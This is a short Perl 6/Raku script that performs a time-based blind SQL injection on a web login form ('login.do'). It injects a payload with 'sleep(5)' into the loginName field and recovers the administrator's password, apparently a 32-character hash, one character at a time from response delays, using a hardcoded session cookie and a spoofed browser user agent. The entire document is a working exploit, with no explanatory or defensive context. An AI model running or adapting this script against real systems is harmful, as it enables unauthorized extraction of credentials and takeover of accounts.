use HTTP::UserAgent;
my $ua = HTTP::UserAgent.new;
my $r = HTTP::Request.new;
my $c = HTTP::Cookies.new;
$c.set-cookie('Set-Cookie:JSESSIONID=06617AD9F324C7D49D3218D800B8FBB6');
my $url = 'http://target/login.do';
$r.uri: $url;
$r.set-method: 'POST';
$r.add-cookies($c);
$r.header.field(:user-agent<Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0>);
my %data = :loginName<inject>,:password<admin>,:vcode<vzhc>;
my @a = 0..9;
my @swap = 'a'..'z';
@a.append(@swap);
my @password;
for 1..32 {
for @a -> $char {
%data<loginName>="admin' and (\'$char\'!=substr(password,$_,1) or 1=sleep(5)) and ''='";
$r.add-form-data(%data);
my $stime = time;
my $result = $ua.request($r);
my $endtime = time;
my $finish_time = $endtime-$stime;
if ($finish_time >= 5) {
say $char;
@password.append($char);
say 'password-> '~@password.join('');
last;
}
}
}
say @password.join('');
